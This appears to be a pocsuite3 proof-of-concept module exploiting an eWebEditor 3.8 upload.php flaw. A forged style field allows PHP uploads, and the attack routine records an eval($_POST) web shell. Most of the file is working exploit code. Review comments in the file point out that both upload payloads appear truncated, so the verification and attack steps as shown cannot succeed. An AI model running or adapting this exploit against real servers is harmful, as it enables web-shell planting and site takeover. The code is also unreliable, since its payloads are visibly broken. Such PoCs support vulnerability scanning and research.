"""
If you have issues about development, please read:
https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md
for more information, please visit http://pocsuite.org
"""
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
from pocsuite3.lib.utils import random_str
from requests.exceptions import ReadTimeout
from urllib.parse import urljoin
import re
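class DemoPOC(POCBase):
    """pocsuite3 PoC for the eWebEditor 3.8 ``ewebeditor/php/upload.php`` upload issue.

    Both ``_verify`` and ``_attack`` POST a hand-built multipart form to
    ``upload.php?action=save&type=FILE&style=toby57``. The ``aStyle[12]`` field in
    that form supplies the style definition itself, listing ``php`` among the
    accepted extensions, which is the root cause described in ``desc``: the
    server trusts request-supplied style data. The path of the stored file is
    taken from the ``parent.UploadSaved('...','')`` fragment in the response.

    ``self.url`` and the ``Output`` plumbing come from ``POCBase``.
    """
    vulID = '1020'  # ssvid
    version = '1'
    author = ['chenghs@knownsec.com']
    vulDate = '2011-08-01'
    createDate = '2013-07-29'
    updateDate = '2013-07-29'
    references = ['http://sebug.net/vuldb/ssvid-20860']
    name = 'eWebEditor 3.8 /ewebeditor/php/upload.php 文件上传漏洞 POC'
    appPowerLink = 'http://www.ewebeditor.com/'
    appName = 'eWebEditor'
    appVersion = '3.8#'
    vulType = 'File Upload'
    # Framework-facing description, kept verbatim. It states that the ``style``
    # parameter is attacker-controlled, which is what lets a PHP file through.
    desc = '''
由于style参数可控,导致可以增加PHP格式文件。
'''
    samples = []
    install_requires = ['']

    def _verify(self):
        """Upload a probe file and report its URL if the server serves it back.

        Returns:
            The ``Output`` built by :meth:`parse_output`. ``result['VerifyInfo']['URL']``
            is set only when the uploaded file is reachable (HTTP 200) and contains
            the marker string checked below; every other path yields a failed
            ``Output``. Exceptions are logged and treated as "not vulnerable".
        """
        result = {}
        try:
            vul_url = urljoin(self.url, 'ewebeditor/php/upload.php?action=save&type=FILE&style=toby57&language=en')
            # The boundary in this header must match the one used in the body.
            headers = {'Content-Type': 'multipart/form-data; boundary=---------------------------19252181925439'}
            # NOTE(review): the file part after its Content-Type line looks
            # truncated in this copy -- the marker string tested below does not
            # occur anywhere in the payload as shown, so verification cannot
            # succeed as written; confirm against the original source.
            # NOTE(review): line endings in the body mix LF with one explicit
            # CRLF (the aStyle line); multipart parsers expect CRLF throughout.
            verify_data = '''-----------------------------19252181925439
Content-Disposition: form-data; name="MAX_FILE_SIZE"
512000
-----------------------------19252181925439
Content-Disposition: form-data; name="aStyle[12]"
toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||ËÎÌå||||||0|||jpg|jpeg|||300|||FFFFFF|||1\r\n
-----------------------------19252181925439
Content-Disposition: form-data; name="uploadfile"; filename="1.php"
Content-Type: application/octet-stream
$url = $_SERVER["PHP_SELF"]; $filename = end(explode("/",$url));unlink($filename);?>
-----------------------------19252181925439--
'''
            # TODO(review): no ``timeout`` is passed, so an unresponsive host
            # blocks the scan indefinitely (``ReadTimeout`` is imported but unused).
            resp = requests.post(vul_url, data=verify_data, headers=headers)
            # Raw string: the original plain string relied on ``\.`` surviving as
            # an unknown escape, which is a SyntaxWarning on Python 3.12+. The
            # compiled pattern is unchanged.
            res = re.findall(r"parent\.UploadSaved\('(.*?)',''\)", resp.text)
            # No ``UploadSaved`` fragment means the upload was rejected; fall
            # through so parse_output reports a failure instead of returning None
            # (the one path that previously bypassed parse_output).
            if res:
                verify_url = urljoin(self.url, res[0])
                response = requests.get(verify_url)
                if response.status_code == 200 and '300d4af0950c89b847cf6f7500e6060c' in response.text:
                    result['VerifyInfo'] = {}
                    result['VerifyInfo']['URL'] = verify_url
        except Exception as e:
            # Best-effort: any network or parsing error is logged, not raised.
            logger.error(str(e))
        return self.parse_output(result)

    def parse_output(self, result):
        """Wrap ``result`` in a framework ``Output``.

        Args:
            result: dict filled by ``_verify``/``_attack``; empty means not vulnerable.

        Returns:
            An ``Output`` marked success (carrying ``result``) when ``result`` is
            non-empty, otherwise marked failed.
        """
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _attack(self):
        """Same request as ``_verify``; on success records the stored file's URL.

        Returns:
            The ``Output`` built by :meth:`parse_output`. ``result['ShellInfo']``
            holds ``URL`` and ``Content`` only when the uploaded file is reachable
            and contains the marker string.
        """
        result = {}
        try:
            vul_url = urljoin(self.url, 'ewebeditor/php/upload.php?action=save&type=FILE&style=toby57&language=en')
            headers = {'Content-Type': 'multipart/form-data; boundary=---------------------------19252181925439'}
            # NOTE(review): the file part has no body at all between its
            # Content-Type line and the closing boundary in this copy; the
            # ``Content`` recorded below suggests a line was lost in extraction.
            # Confirm against the original source.
            attack_data = '''-----------------------------19252181925439
Content-Disposition: form-data; name="MAX_FILE_SIZE"
512000
-----------------------------19252181925439
Content-Disposition: form-data; name="aStyle[12]"
toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||ËÎÌå||||||0|||jpg|jpeg|||300|||FFFFFF|||1\r\n
-----------------------------19252181925439
Content-Disposition: form-data; name="uploadfile"; filename="1.php"
Content-Type: application/octet-stream
-----------------------------19252181925439--
'''
            # TODO(review): same missing ``timeout`` as in _verify.
            resp = requests.post(vul_url, data=attack_data, headers=headers)
            # Raw-string form of the original pattern (see _verify).
            res = re.findall(r"parent\.UploadSaved\('(.*?)',''\)", resp.text)
            # Fall through on no match so parse_output reports the failure.
            if res:
                shell_url = urljoin(self.url, res[0])
                response = requests.get(shell_url)
                if response.status_code == 200 and '300d4af0950c89b847cf6f7500e6060c' in response.text:
                    result['ShellInfo'] = {}
                    result['ShellInfo']['URL'] = shell_url
                    result['ShellInfo']['Content'] = "<?php echo '300d4af0950c89b847cf6f7500e6060c'; eval($_POST[a]);?>"
        except Exception as e:
            # Best-effort: any network or parsing error is logged, not raised.
            logger.error(str(e))
        return self.parse_output(result)

    def _shell(self):
        """Not implemented; the reverse-payload helpers imported at module top are unused."""
        pass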
# Register the PoC class with the pocsuite3 framework so the scanner can load it.
register_poc(DemoPOC)